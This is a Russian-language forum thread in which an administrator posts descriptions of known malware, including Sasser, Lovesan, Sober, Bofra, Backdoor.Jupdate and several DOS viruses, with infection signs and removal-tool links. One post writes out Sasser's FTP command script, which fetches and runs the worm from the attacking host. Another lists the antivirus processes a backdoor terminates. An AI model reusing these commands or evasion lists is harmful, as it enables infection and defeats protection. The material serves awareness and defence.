Осторожно!
| |
Battle | Дата: Четверг, 2006.02.16, 02:20:53 | Сообщение # 26 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| W32.Buchon.A@mm W32.Buchon.A@mm - это червь массовой рассылки, использующий свой собственный SMTP сервер, чтобы рассылать себя по email адресам, которые он найдет на зараженном компьютере. Так же известен как W32/Baba-A [Sophos], W32/Buchon.gen@MM [McAfee], W32/Buchon@mm [F-Secure], Win32.Netsky.AG [Computer Associates], WORM_NETSKY.AI [Trend Micro]. При запуске W32.Buchon.A@mm выполняет следующие действия: 1. Открывает файл c:\csrss.exe, который является трояном, и выполняет его. При запуске Троян выполняет следующие действия: a. добавляет значение: "Key Logger" = c:\csrss.exe" в ключ реестра: HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run b. Открывает не злонамеренный файл c:\csrss.bin c. Выступает в качестве прокси сервера и может выполнять команды атакующего на загрузку файлов из интернета. 2. Ищет email адреса в файлах с расширениями # .dat # .dbx # .eml # .mbx # .mdb # .tbb # .wab 3. Крадет email адреса из файлов, имя которых содержит "inbox". 4. Посылает SYN пакеты по случайным IP адресам на случайные TCP порты в интервале между 28000 и 28500.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:25:20 | Сообщение # 27 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Worm.Win32.Sasser.a Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011 (http://www.viruslist.com/click?_URL=http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx). Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года. Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM. Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет. Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2. Признаками заражения компьютера являются: Наличие файла "avserve.exe" в каталоге Windows. Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы. Размножение При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe" Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе. Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы. Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996. После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела: echo off echo open [адрес машины с которой производится атака] 5554>>cmd.ftp echo anonymous>>cmd.ftp echo user echo bin>>cmd.ftp echo get [произвольное число]_up.exe>>cmd.ftp echo bye>>cmd.ftp echo on ftp -s:cmd.ftp [произвольное число]_up.exe echo off del cmd.ftp echo on Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например: 23101_up.exe 5409_up.exe и т.д. Прочее После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться. Червь создает в корневом каталоге диска C: файл "win.log", который содержит IP-адреса атакуемых машин. Бесплатная утилита для удаления Sasser.a - ftp://ftp.kaspersky.com/utils/clrav/clrav.zip
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:25:53 | Сообщение # 28 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Worm.Win32.Sasser.b Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011 (http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx). Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года. Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM. Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет. Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2. Признаками заражения компьютера являются: Наличие файла "avserve2.exe" в каталоге Windows. Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы. Отличия от версии Sasser.a Данный вариант червя отличается от варианта Sasser.a измененным именем своего файла. Вместо "avserve.exe" используется "avserve2.exe" (соответственно изменен и ключ в системном реестре). Также изменено на "Jobaka3" название создаваемого идентификатора и добавлена попытка создания еще одного идентификатора "JumpallsNlsTillt". Кроме этого, изменено число запускаемых процедур заражения - вместо 128 их число увеличено до 1024. Изменено название лог-файла на "win2.log". Бесплатная утилита для удаления Sasser.b - http://www.kaspersky.ru/removaltools?vtopen=146410248#open
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:26:22 | Сообщение # 29 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Worm.Win32.Sasser.c Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011 (http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx). Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года. Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM. Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет. Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 16 КБ, упакован PECompact2. Признаками заражения компьютера являются: Наличие файла "skynetave.exe" в каталоге Windows. Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы. Отличия от версии Sasser.b Данный вариант червя отличается от варианта Sasser.b измененным именем своего файла. Вместо "avserve2.exe" используется "skynetave.exe" (соответственно изменен и ключ в системном реестре). Также изменено название создаваемого идентификатора - "SkynetSasserVersionWithPingFast". При атаке на удаленной машине запускается remote shell на порту TCP 9995. Перед отправкой эксплоита на атакуемую машину, червь отправляет предварительный ICMP запрос.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:29:25 | Сообщение # 30 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| I-Worm.Sober.i Сетевой червь, распространяющийся по электронной почте в виде файлов, прикрепленных к зараженным письмам. Написан на языке Visual Basic. Упакован UPX. Размер в упакованном виде 56808 байт. Инсталляция Червь активизируется, только если пользователь самостоятельно открывает вложенный файл. После запуска червь выводит на экран ложное сообщение об ошибке: WinZip Self-Extractor WinZip_Data_Module is missing ~Error: Создает в системном каталоге Windows два EXE-файла с именами, формируемыми из следующих частей: 32 crypt data diag dir disc expolrer host log run service smss32 spool sys win Напр имер, "windiag.exe" и "data.exe". Данные файлы являются основными компонентами червя, производящими сбор адресов и рассылку копий червя по электронной почте. Червь регистрирует себя в ключе автозагрузки системного реестра: [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ] "<случайный ключ>"="%System%\<имя файла червя>" [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ] "<случайный ключ>"="%System%\<имя файла червя>" Создает еще несколько своих копий и вспомогательных файлов с разными именами в системном каталоге Windows: clonzips.ssc clsbern.isc cvqaikxt.apk dgssxy. yoi nonzipsr.noz Odin-Anon.Ger sysmms32.lla zi ppedsr.piz Размножение Червь ищет адреса email на жестких дисках в файлах с расширениями из приводимого ниже списка и рассылает на найденные зараженные письма. abc abd abx adb ade adp adr asp bak bas cfg cgi cls cms csv ctl dbx dhtm doc ds p dsw eml fdb frm hlp imb imh imh imm inbox ini jsp ldb ldif lo g mbx mda mdb mde mdw mdx mht mmf msg na b nch nfo nsf nws ods oft php pl pmr pp ppt pst rtf shtml slk s ln stm tbb txt uin vap vbs vcf wab wsh x html xls xml Для рассылки зараженных писем по найденным адресам червь использует прямое подключение к SMTP-серверу. Найденные адреса электронной почты червь сохраняет в файлах с именами: winexerun.dal winmprot.dal winroot64.dal wins end32.dal Зараженные письма содержат произвольные темы и тексты на немецком или английском языке (несколько десятков различных вариантов), которые составляются из нескольких доступных частей. Имя вложения также может варьироваться. Допустимы расширения pif, zip и bat. Прочее Червь может загружать с удаленных сайтов на зараженный компьютер любые файлы и запускать их.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:31:45 | Сообщение # 31 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Macro.Word97.Blaster (aka Cont) Опасный макро-вирус, известен также под именем "W97M.Cont". Заражает область системных макросов при открытии зараженного документа. Остальные документы заражает при их закрытии. Процед*ра заражения ищет процедуры вируса "ocument_Close" и "ocument_Open" и записывает их на диск в файл "C:\CONT.DBL". При заражении документа код вируса из этого файла добавляется в документ, при этом макросы присутствующие в документе не удаляются, кроме макросов, имена которых совпадают с именами процедур вируса. В одном случае из двух вирус меняет информацию о документе (summary info): Заголовок = "Macro Carrier" Автор = "ream Blaster" Ключевые слова = "Minny" При закрытии документа вирус проверяет системную дату и по 17-м числам запускает процедуру, которая ищет файл "C:\MINNY.LOG" с установленными аттрибутами "скрытий" и "только чтение". Если такой файл не найден, процед*ра добавляет в файл "AUTOEXEC.BAT" команды которые удаляют все файлы и каталоги на дисках C:, D:, E: и F: при следующей перезагрузке компьютера.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:32:09 | Сообщение # 32 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| CorporateLife Неопасные резидентные полиморфик-вирусы. Перехватывают INT 21h и записываются в конец EXE-файлов при вызове функций DOS FindFirst/Next FCB. При заражении файлов используют FCB-вызовы. Содержат ошибки и могут портить файлы при заражении. Если на компьютере установлен Sound Blaster со Speech-драйвером, вирусы передают этому драйверу строку: "CorporateLife.1929,1937": Fuck Corporat Life. "CorporateLife.1931,1935,1939,1943,1947,195 1,1957,1961,1971": Mini Cat Вирусы также содержат строки: "CorporateLife.1929,1937": $B -=[$$$ Corporate Life $$$]=- P$ "CorporateLife.1931,1935,1939,1943,1947,1951,195 7,1961,1971": B Mini-Cat 4/96 P
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:32:34 | Сообщение # 33 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Indonga, семейство Очень опасные резидентные зашифрованные вирусы. Перехватывают INT 21h и записываются в конец COM- и EXE-файлов. В зависимости от системной даты портят CMOS, или что-то проигрывают (пищат?) на Sound Blaster, или возвращают управление DOS вместо программы-носителя. Indonga.2062,2125 Заражают файлы (кроме COMMAND.COM) при их запуске. 22-го и 24-го сентября стирают сектора дисков и выводят текст: "Indonga.2062": PINDONGA Virus V1.4. (Hecho en ARGENTINA) Programado por: OTTO (16/9/77) Saludos a: MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA) "Indonga.2125": PINDONGA Virus. (Hecho en ARGENTINA) Programado por: OTTO (16/9/77) Saludos a: MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA) Indonga.3652,4010 Перехватывают также INT 20h, 2Fh. Заражают COMMAND.COM также как и файлы, к которым идет обращение. 16-го сентября, 25-го февраля, 21-го марта, 27-го августа "Indonga.3652" стирает сектора дисков и выводит текст: PINDONGA Virus V5.6. (Hecho en ARGENTINA) Programado por Otto (16977) Saludos a MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA-PABLIN PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA) PINDONGA Virus (Programado por OTTO en ARGENTINA) 16977. "Indonga.4010" в зависимости от нескольких условий стирает сектора дисков и выводит текст: +-----+ |SARIN| |VIRUS| |-----| |HECHO| | POR | |-NOP-| +-----+
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:33:02 | Сообщение # 34 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Torpino Неопасный резидентный полиморфик-вирус. Имеет внушительный размер - около 11Кб ассемблерного кода. Зашифрован двенадцатью полиморфик-циклами. Записывается в конец COM- и EXE-файлов кроме COMMAND.COM. При инсталляции своей TSR-копии вирус правит блоки распределения DOS-памяти, выделяет себе блок памяти размера 12Кб и копирует туда свой код. В том случае, если вирус запускается из зараженного WIN.COM или KEYB.COM (т.е. из файла, который находится в памяти до следующей перезагрузки) вирус не выделяет себе DOS-память, а остается резидентно как часть запущенной программы. В завершение своей инсталляции вирус перехватывает INT 9, 1Ch, 21h (клавиатура, таймер, DOS-функции) и затум заражает COM- и EXE-файлы, к которым идет обращение (запуск, открытие, создание, и т.д.). Перед тем, как вернуть управление программе-носителю, вирус также заражает файлы: C:\WINDOWS\COMMAND\KEYB.COM C:\DOS\KEYB.COM C: \KEYB.COM Вирус использует анти-антивирусные приемы. При инсталляции в память он ищет и отключает резидентные мониторы TBAV и SCAN. Не заражает антивирусы: VIRSTOP2, VIRSTOP, F-PROT, SCAN, TBAV, NAV. Уничтожает антивирусные файлы данных: CHKLIST.MS, ANTI-VIR.DAT. При первом запуске на компьютере вирус создает файл KEYB.SYS в одном из каталогов C:\WINDOWS, C:\DOS или в C:\ (корневой). Вирус записывает туда текст: Do not modify this file! keyboard=1,0,x keyboard=1,0,x keyboard=1, 0,x keyboard=1,0,x keyboard=1,0,x yy где 'x' - любые ASCII-символы, а 'yy' - счетчик запусков зараженных файлов. В зависимости от этого счетчика вирус активизирует свои проявления, которые вызываются из перехватчиков INT 9 и INT 1Ch. Начиная с 1000 они выводят различные сообщения, меняют строки на экране, меняют символы в буфере клавиатуры и т.п. Начиная с 800-го запуска зараженной программы вирус также дописывает в файлу C:\AUTOEXEC.BAT команды, которые выводят одно из случайно выбранных сообщений: Your keyboard has expired its evaluation period! Please, register to Microsoft© Corporation. Found hardware error on video card (code 23001): Please, move your monitor and reboot the PC. Found error: ah ah ah ah... eh eh eh eh....... uh uh uh uh.... Dr.SCSI & Mr.IDE Your Hard Disk is boring to live... Youthanasia will start now... (formatting C:) Found Boot error: replace the TORPINO Card and reboot the system immediately ! This message is a property of F-PROT Antivirus: Please, contact Fridrick for more info... Вирус проверяет данные в дополнительном файле C:\TORPASS.DAT и в зависимости от его содержимого отключает некоторые свои проявления (если первые 4 байта этого файла совпадают с серийным номером диска C:). Если пятый байт этого файла ненулевой, вирус пищит спикером компьютера при заражении каждого очередного файла. Вирус содержит строки текста, некоторые из них используются в эффектах вируса: TORPINO You are a Torpiner C O N G R A T U L A T I O N S ! Your PC is my new house ! I'm not a destroyer... I'm the incredible Virus... --> T O R P I N O © <-- Turn on Sound Blaster Speakers ! We Thank Very Much The F-PROT Antivirus For The Contribution To The Spread Of This Virus... Have A Good Time ! By The Virus TORPINO © Ver. 2.0, Copyright© 1997 By DR.SCSI And Mr. IDE. Total Rows Code: 3474, Coded In ITALY, Around MATERA, In July-December 1997. Direct Support: Our Heads; Dave Mustaine; Billy (A Programmer Dog!). Indirect Support: The Great Dark Avenger; N.R.L.G Team; Peter Norton (Smack !); Our WorkStation: Two 486; The Obscure Author Of Tentacle.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:33:25 | Сообщение # 35 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Worm.Win32.Lovesan.a Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе DCOM RPC Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS03-026. Червь написан на языке C, с использованием компилятора LCC. Имеет размер 6КB, упакован UPX. Размножается в виде файла с именем "msblast.exe". Содержит текстовые строки: I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!! Признаками заражения компьютера являются: Наличие файла "msblast.exe" в системном (system32) каталоге Windows. Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы. Размножение При запуске червь регистрирует себя в ключе автозапуска: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run windows auto update="msblast.exe" Червь сканирует IP-адреса, начинающиеся с "base address" и пытается соединиться с 20 IP-адресами для инфицирования уязвимых компьютеров. После этого червь "спит" в течение 1,8 секунды, а затем снова сканирует 20 IP-адресов и повторяет этот процесс в бесконечном цикле. Например, если "base address" является 20.40.50.0, червь будет сканировать следующие адреса: 20.40.50.0 20.40.50.1 20.40.50.2 ... 20.40.5 0.19 ----------- пауза 1.8 секунды 20.40.50.20 ... 20.40.50.39 ---------- - пауза 1.8 секунды ... ... 20.40.51.0 20.40.51.1 ... 20 .41.0.0 20.41.0.1 и так далее. Червь выбирает один из двух методов сканирования IP-адресов: В 3 случаях из 5 червь выбирает случайный "base address" (A.B.C.D), где D равен 0, а A, B, C случайно выбраны из диапазона 1-255. Таким образом "base address" находится в диапазоне [1-255].[1-255].[1-255].0. В 2 случаях из 5 червь сканирует подсеть. Он определяет адрес локального компьютера (A.B.C.D), устанавливает D в ноль и выбирает значение C. Если C - больше чем 20, то червь выбирает случайное число от 1 до 20. Если C меньше или равно 20, червь не изменяет его. Например, если инфицированная машина имеет IP-адрес "207.46.134.191", то червь будет сканировать адреса с 207.46.[115-134].0. Если IP-адрес - "207.46.14.1", то червь будет сканировать адреса, начиная с 207.46.14.0. Используя уязвимость в Microsoft Windows 2000/XP, отправляет на 135 порт выбранного IP-адреса команды эксплойта DCOM RPC и запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 4444. После этого червь, при помощи команды tftp get, через 69 порт загружает себя на удаленную машину в системный каталог Windows и запускает на исполнение. Прочее После заражения инфицированная машина выводит сообщение об ошибке RPC service failing, после чего может попытаться перезагрузиться. C 16 августа 2003 года червь запускает процедуры DDoS атаки на сервер windowsupdate.com, пытаясь таким образом затруднить или прервать его работу.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:34:58 | Сообщение # 36 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| I-Worm.Bofra.a Вирус-червь. Использует уязвимость в Internet Explorer. Распространяется через интернет в виде зараженных писем без вложения. Червь не помещает свою копию в зараженное письмо, а помещает только ссылку на зараженный файл, находящийся на компьютере, с которого пришло это письмо. В момент обращения к полученной ссылке (происходит автоматически в случае срабатывания эксплойта приведенной выше уязвимости) происходит переполнение буфера и автоматический запуск зараженного файла. Письма рассылаются по всем найденным на зараженном компьютере адресам электронной почты. Червь является приложением Windows (PE EXE-файл), имеет размер около 21КБ, упакован MEW. Размер распакованного файла около 135КБ. Червь содержит в себе функцию бэкдора, принимающего команды по каналам IRC. Инсталляция После запуска червь копирует себя с произвольным именем, (любой набор символов, который всегда заканчивается на "32.exe", в системный каталог Windows. Например: C:\WINDOWS\SYSTEM32\kfilaxm32.exe Затем регистрирует данный файл в ключе автозагрузки системного реестра: [HKLM\Software\Microsoft\Windows\CurrentVersion\Run ] "Rhino" = "%System%\<любой набор символов>32.exe" Распространение через email Для поиска адресов жертв червь сканирует адресные книги MS Windows, а также ищет адреса в файлах со следующими расширениями: adbh aspd dbxn htmb phpq pl shtl tbbg tx t wab При этом червем игнорируются адреса, содержащие следующие подстроки: .edu .gov .mil abuse accoun acketst admin a nyone arin. avp berkeley borlan bsd bugs ca certific contact example feste fido foo. f sf. gnu gold-certs google gov. help hotmail iana ibm.com icrosof icrosoft ietf info inpr is isc.o isi.e kernel linux listserv math m e mit.e mozilla msn. mydomai no nobody nodo mai noone not nothing ntivi page panda pgp postmaster privacy rating rfc-ed ripe. root r uslis samples secur sendmail service site so ft somebody someone sopho submit support sym a tanford.e the.bat unix usenet utgers.ed we bmaster you your При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам. Характеристики зараженных писем Отправитель: Имя отправителя включает в себя одну из следующих строк: adam alex alice andrew anna bill bob bren da brent brian claudia dan dave david debby fred george helen jack james jane jerry jim jimm y joe john jose julie kevin leo linda mari a mary matt michael mike peter ray robert sam sandra serg smith stan steve ted tom Домен отправителя выбирается случайным образом из найденных на зараженном компьютере email-адресов или используется любой домен из списка: aol.com hotmail.com msn.com yahoo.com Тема письма: Выбирается из списка: funny photos hello hey! Текст письма: Выбирается из следующих вариантов: FREE ADULT VIDEO! SIGN UP NOW! Look at my homepage with my last webcam photos! Файл-вложение: В письме нет никаких вложений. Червь отправляет только ссылку на зараженный компьютер. Ссылка имеет следующий формат: http://<IP-адрес зараженного компьютера>:<номер открытого порта>/<название файла> Червь открывает на зараженном компьютере TCP порт от 1639 и выше для скачивания файла. Подпись к письму: Выбирается из списка: Checked by Dr.Web (http://www.drweb.net) Checked for viruses by Gordano's AntiVirus Software scanned for viruses by AMaViS 0.2.1 (http://amavis.org/) Удаленное администрирование Червь открывает на зараженной машине TCP порт 6667 для соединения с IRC-каналами для приема команд.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:37:52 | Сообщение # 37 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Backdoor.Jupdate Backdoor.Jupdate - это бэкдор, который позволяет удаленному атакующему загружать и выполнять файлы на зараженном компьютере. При запуске Backdoor.Jupdate выполняет следующие действия: 1. Копирует себя в следующий файл, с произвольным названием, состоящим от четыркх до восьми символов в нихнем регистре: * %System%\[random name].exe * %System%\[random name].dat (text file) 2. Добавляет значение: "JavaUpdate0.07"="%system%\[dropped filename]" в ключ реестра: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run 3.Пытается закрыть следующие процессы: # ccapp.exe # smc.exe # zlclient.exe # ZONEALARM.EXE # WFINDV32.EXE # WEBSCANX.EXE # VSSTAT.EXE # VSHWIN32.EXE # VSECOMR.EXE # VSCAN40.EXE # VETTRAY.EXE # VET95.EXE # TDS2-NT.EXE # TDS2-98.EXE # TCA.EXE # TBSCAN.EXE # SWEEP95.EXE # SPHINX.EXE # SMC.EXE # SERV95.EXE # SCRSCAN.EXE # SCANPM.EXE # SCAN95.EXE # SCAN32.EXE # SAFEWEB.EXE # RESCUE.EXE # RAV7WIN.EXE # RAV7.EXE # PERSFW.EXE # PCFWALLICON.EXE # PCCWIN98.EXE # PAVW.EXE # PAVSCHED.EXE # PAVCL.EXE # PADMIN.EXE # OUTPOST.EXE # NVC95.EXE # NUPGRADE.EXE # NORMIST.EXE # NMAIN.EXE # NISUM.EXE # NAVWNT.EXE # NAVW32.EXE # NAVNT.EXE # NAVLU32.EXE # NAVAPW32.EXE # N32SCANW.EXE # MPFTRAY.EXE # MOOLIVE.EXE # LUALL.EXE # LOCKDOWN2000.EXE # JEDI.EXE # IOMON98.EXE # IFACE.EXE # ICSUPPNT.EXE # ICSUPP95.EXE # ICMON.EXE # ICLOADNT.EXE # ICLOAD95.EXE # IBMAVSP.EXE # IBMASN.EXE # IAMSERV.EXE # IAMAPP.EXE # FRW.EXE # FPROT.EXE # FP-WIN.EXE # FINDVIRU.EXE # F-STOPW.EXE # F-PROT95.EXE # F-PROT.EXE # F-AGNT95.EXE # ESPWATCH.EXE # ESAFE.EXE # ECENGINE.EXE # DVP95_0.EXE # DVP95.EXE # CLEANER3.EXE # CLEANER.EXE # CLAW95CF.EXE # CLAW95.EXE # CFINET32.EXE # CFINET.EXE # CFIAUDIT.EXE # CFIADMIN.EXE # BLACKICE.EXE # BLACKD.EXE # AVWUPD32.EXE # AVWIN95.EXE # AVSCHED32.EXE # AVPUPD.EXE # AVPTC32.EXE # AVPM.EXE # AVPDOS32.EXE # AVPCC.EXE # AVP.EXE # AVNT.EXE # AVKSERV.EXE # AVGCTRL.EXE # AVE32.EXE # AVCONSOL.EXE # AUTODOWN.EXE # APVXDWIN.EXE # ANTI-TROJAN.EXE # ACKWIN32.EXE # _AVPM.EXE # _AVPCC.EXE # AVP32.EXE 4. Прослушивает произвольный TCP порт и ожидает команд от удаленного атакующего. Это позволяет атакующему скачивать и запускать файлы на зараженной машине.
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:38:17 | Сообщение # 38 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| Zombie.VPI Резидентные вирусы, записываются в конец EXE-файлов при их запуске, открытии и чтении/изменении атрибутов файла. Используют два необычных приема: кодирование при заражении файлов и запись своей TSR-копии в Shadow RAM. При запуске зараженного файла вирус проверяет порты Shadow RAM (эти порты присутствуют только на Pentium-компьютерах). Если порты доступны, вирус ищет "дыру" подходящего размера в Shadow RAM, открывает ее на запись, копирует туда свой код и закрывает Shadow RAM. Если свободного места в Shadow RAM недостаточно, вирус либо записывает себя вместо одного из стандартных фонтов, либо ищет и записывается вместо кода какого-то драйвера, если фонт или драйвер расположен в Shadow RAM. Затем вирус перехватывает INT 13h и при запуске любого EXE-файла перехватывает INT 21h. После инсталляции своей TSR-копии в Shadow RAM вирус закрывает ее на запись. При вызовах INT 13h, 21h, если вирусу необходимо произвести изменения в своих данных, он временно разрешает запись в Shadow RAM. При заражении файлов вирус достаточно забавным способом кодирует свое тело - байты кода вируса не шифруются, как это бывает с обычными шифрованными вирусами, а переводятся в последовательность байт, принимающих всего два значения - 0 и FFh. Каждый байт кода вируса записывается в виде последовательности из восьми байт - нулевые биты байта преобразуются в 0, а 1 - в FFh. В результате, имея длину менее 2K, вирус увеличивает длины EXE-файлов более чем на 15K. При чтении секторов, содержащих информацию о каталоге, вирус ищет и уничтожает в них ссылки на файлы: ADINF, AIDS, AVP, WEB, DRWEB, *.CPP, *.C, S-ICE, TD, DEBUG, WEB70801, CA.AV? Вирус также содержит текст: Z0MBiE`1635 v1.00 © 1997 Z0MBiE Tnx to S.S.R. & Lerg ShadowRAM/Virtual Process Infector
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:38:54 | Сообщение # 39 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| HLLP.Tomsk.8506 Неопасный нерезидентный вирус. Написан на Паскале. При запуске ищет .EXE-файлы во всех подкаталогах текущего диска записывается в их начало. Для того, чтобы передать управление программе-носителю, вирус временно лечит свой файл и запускает его на выполнение. Вирус проверяет защиту от записи для текущего диска. Если диск защищен от записи, то вирус выводит сообщение "Runtime Error: Disk fool or write protect" и прекращает свою работу. 20 октября вирус выводит сообщение и ждет нажатия на клавишу: Сегодня у моего автора день рождения!!! Ты рад [Y/N] Если пользователь нажимает клавишу 'N', то вирус выводит сообщение и завешивает компьютер: Ну ты, блин, круто встрял!!! Я твой фат в память скопировал!!! Если пере- загрузишь машину -- информацию не восстaновишь!!! Если пользователь нажимает 'Y', то вирус выводит сообщение и продолжает работу: Доставай пиво и водку... Щас синячить будем!!! Зови баб!!! Врубай музыку! Раз ты такой хороший -- я тебе ничего портить не буду!!! Если в командной строке указать ключ /?, то вирус выводит сообщение: +------------------------------------+ | Virus 3.14Zdec V 2.0 | |------------------------------------ | | Target *.EXE | | Stealth No | | TSR No | | Attac speed Slow | | anger 0 | | Effects Yes | | Length KingSize= | | Language Turbo Pascal | | OS Dos, Windows | | | | Данный вирус был написан в учебных| | целях. Если данный образец самоход-| | ного програмного обеспечения ока- | | зался у Вас--Вам следует воспользо-| | ваться антивирусной программой!!!| | СПАСИБО ЗА ВНИМАНИЕ | |Russia, Tomsk, 20/11/1999 | +------------------------------------+
Настали суровые времена. Связь: LEONeso@gmail.com
|
|
| |
Battle | Дата: Четверг, 2006.02.16, 02:39:30 | Сообщение # 40 |
Та все норм.
Группа: Администраторы
Сообщений: 864
Статус: Offline
| HLLC.Cumulus Откомпилированы на языках высокого уровня (High Level Language) и часто содержат строки-копирайты от соответствующих компиляторов: Turbo C++ - Copyright 1990 Borland Intl. Null pointer assignment Abnormal program termination Divide error Runtime error Делятся на группы: HLLC: High Level Language Companion viruses. Являются компаньон-вирусами. HLLO: High Level Language Overwriting viruses. Ищут файлы и записываются вместо них. HLLP: High Level Language Parasitic viruses. Записываются в конец или начало файлов, зараженные файлы остаются работоспособными. HLLC.16850 Ищет .EXE-файлы и создает companion-файлы, имеющие имя .EXE-файла и расширение .COM. Написан на Turbo-C. HLLC.17690 Нерезидентный неопасный вирус, ищет .COM- и .EXE-файлы в дереве подкаталогов случайно выбранного диска, затем переименовывает их в файлы со случайными названиями, сохраняет эти названия в своем теле в закодированном виде и записывается на диск под первоначальным именем файла. При запуске зараженного файла вирус выполняет (используя при этом соответствующую функцию DOS) переименованный файл. Таким образом содержимое файлов при заражении не 